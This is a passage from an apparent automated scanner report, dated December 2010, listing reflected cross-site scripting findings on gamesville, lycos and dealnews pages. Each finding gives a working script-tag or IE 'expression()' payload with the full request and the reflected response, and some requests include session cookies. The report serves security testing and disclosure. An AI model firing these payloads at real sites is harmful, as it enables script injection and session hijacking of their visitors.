The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc939"><script>alert(1)</script>3fc3efe8798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc939\"><script>alert(1)</script>3fc3efe8798 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bc939"><script>alert(1)</script>3fc3efe8798=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/?bc939\"><script>alert(1)</script>3fc3efe8798=1"/>
...[SNIP]...

3.16. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3047/win-a-new-laptop-this-month-at-gamesville-com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e58b"><script>alert(1)</script>e67fb4e0f35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e58b\"><script>alert(1)</script>e67fb4e0f35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3047/win-a-new-laptop-this-month-at-gamesville-com?6e58b"><script>alert(1)</script>e67fb4e0f35=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3047>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3047/win-a-new-laptop-this-month-at-gamesville-com?6e58b\"><script>alert(1)</script>e67fb4e0f35=1"/>
...[SNIP]...

3.17. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e28c3"><script>alert(1)</script>c1dd954abbb was submitted in the REST URL parameter 3. This input was echoed as e28c3\"><script>alert(1)</script>c1dd954abbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1e28c3"><script>alert(1)</script>c1dd954abbb HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1e28c3\"><script>alert(1)</script>c1dd954abbb"/>
...[SNIP]...

3.18. http://blog.gamesville.com/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b54dd"><script>alert(1)</script>f9d8de1e657 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b54dd\"><script>alert(1)</script>f9d8de1e657 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1?b54dd"><script>alert(1)</script>f9d8de1e657=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3047>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3047/win-a-new-laptop-this-month-at-gamesville-com/comment-page-1?b54dd\"><script>alert(1)</script>f9d8de1e657=1"/>
...[SNIP]...

3.19. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d07"><script>alert(1)</script>d04b7f19c87 was submitted in the REST URL parameter 3. This input was echoed as b2d07\"><script>alert(1)</script>d04b7f19c87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1b2d07"><script>alert(1)</script>d04b7f19c87 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1b2d07\"><script>alert(1)</script>d04b7f19c87"/>
...[SNIP]...

3.20. http://blog.gamesville.com/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d2ca"><script>alert(1)</script>f7c5056a9c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d2ca\"><script>alert(1)</script>f7c5056a9c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1?6d2ca"><script>alert(1)</script>f7c5056a9c8=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3110>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3110/snakes-on-a-plane-pfft-meet-goats-on-a-dam/comment-page-1?6d2ca\"><script>alert(1)</script>f7c5056a9c8=1"/>
...[SNIP]...

3.21. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ba0d"><script>alert(1)</script>f2dc20303b2 was submitted in the REST URL parameter 3. This input was echoed as 4ba0d\"><script>alert(1)</script>f2dc20303b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-14ba0d"><script>alert(1)</script>f2dc20303b2 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 12 Dec 2010 14:27:31 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-14ba0d\"><script>alert(1)</script>f2dc20303b2"/>
...[SNIP]...

3.22. http://blog.gamesville.com/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.gamesville.com
Path:   /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40d3"><script>alert(1)</script>221b93386cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e40d3\"><script>alert(1)</script>221b93386cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1?e40d3"><script>alert(1)</script>221b93386cc=1 HTTP/1.1
Host: blog.gamesville.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://blog.gamesville.com/xmlrpc.php
Link: <http://blog.gamesville.com/?p=3114>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<input type="hidden" name="m_CBURL" value="http://blog.gamesville.com/wp-login.php?redirect_to=/3114/lmtrtr-of-milwaukee-wi-wins-1443-playing-three-eyed-bingo-on-gamesville/comment-page-1?e40d3\"><script>alert(1)</script>221b93386cc=1"/>
...[SNIP]...

3.23. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16eb4"><script>alert(1)</script>b6c9dd0275a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?16eb4"><script>alert(1)</script>b6c9dd0275a=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:27:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/?16eb4"><script>alert(1)</script>b6c9dd0275a=1&mobile=1" rel="nofollow">
...[SNIP]...

3.24. http://dealnews.com/lw/artclick.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealnews.com
Path:   /lw/artclick.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be8c4<script>alert(1)</script>c1799e733f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lwbe8c4<script>alert(1)</script>c1799e733f/artclick.html HTTP/1.1
Host: dealnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=bn9ub373pc8q8p5g75cf8jgjion1rvnd; expires=Sun, 09-Jan-2011 14:27:24 GMT; path=/; domain=.dealnews.com
Content-Length: 1074
Connection: close
Content-Type: text/html; charset=utf-8

<html><head><title>File Not Found</title>
<style>
body, td {
font-family: Arial;
font-size: 10pt;
}
a:link {
color: #30309A;
}
a:visited {
color: #1f2e62;
}
</style></head><body><div align="center" st
...[SNIP]...
<p>The page you've requested, "http://dealnews.com/lwbe8c4<script>alert(1)</script>c1799e733f/artclick.html", no longer exists or has moved to a new location.
If you're unable to find what you were looking for, please contact the
<a href="/contact.html">
...[SNIP]...

3.25. http://dealnews.com/lw/artclick.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealnews.com
Path:   /lw/artclick.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be84f<script>alert(1)</script>75d2f5468e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /lwbe84f<script>alert(1)</script>75d2f5468e6/artclick.html?2,414584,1328790,eref=lycos HTTP/1.1
Host: dealnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 14:27:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Status: 404 Not Found
Set-Cookie: LOLSESS=9es4l9sjbia99svl89q5o3e327nsldmu; expires=Sun, 09-Jan-2011 14:27:27 GMT; path=/; domain=.dealnews.com
Content-Length: 1075
Connection: close
Content-Type: text/html; charset=utf-8

<html><head><title>File Not Found</title>
<style>
body, td {
font-family: Arial;
font-size: 10pt;
}
a:link {
color: #30309A;
}
a:visited {
color: #1f2e62;
}
</style></head><body><div align="center" st
...[SNIP]...
<p>The page you've requested, "http://dealnews.com/lwbe84f<script>alert(1)</script>75d2f5468e6/artclick.html", no longer exists or has moved to a new location.
If you're unable to find what you were looking for, please contact the
<a href="/contact.html">
...[SNIP]...

3.26. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /coupons

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656f6"style%3d"x%3aexpression(alert(1))"bdfcf5416e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 656f6"style="x:expression(alert(1))"bdfcf5416e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coupons?656f6"style%3d"x%3aexpression(alert(1))"bdfcf5416e5=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;656f6"style="x:expression(alert(1))"bdfcf5416e5=1">
...[SNIP]...

3.27. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bb70"style%3d"x%3aexpression(alert(1))"b6416fcc52e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9bb70"style="x:expression(alert(1))"b6416fcc52e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals?9bb70"style%3d"x%3aexpression(alert(1))"b6416fcc52e=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="/deals?pn=2&amp;9bb70"style="x:expression(alert(1))"b6416fcc52e=1">
...[SNIP]...

3.28. http://deals.lycos.com/deals/category/automotive-238 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/automotive-238

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff964"style%3d"x%3aexpression(alert(1))"467fcf726ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff964"style="x:expression(alert(1))"467fcf726ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/automotive-238?ff964"style%3d"x%3aexpression(alert(1))"467fcf726ca=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;ff964"style="x:expression(alert(1))"467fcf726ca=1">
...[SNIP]...

3.29. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cameras-167

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e0b4"style%3d"x%3aexpression(alert(1))"76383e47512 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e0b4"style="x:expression(alert(1))"76383e47512 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/cameras-167?2e0b4"style%3d"x%3aexpression(alert(1))"76383e47512=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;2e0b4"style="x:expression(alert(1))"76383e47512=1">
...[SNIP]...

3.30. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/clothing-and-accessories-202

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c906"style%3d"x%3aexpression(alert(1))"2a42ce649cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c906"style="x:expression(alert(1))"2a42ce649cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/clothing-and-accessories-202?2c906"style%3d"x%3aexpression(alert(1))"2a42ce649cd=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
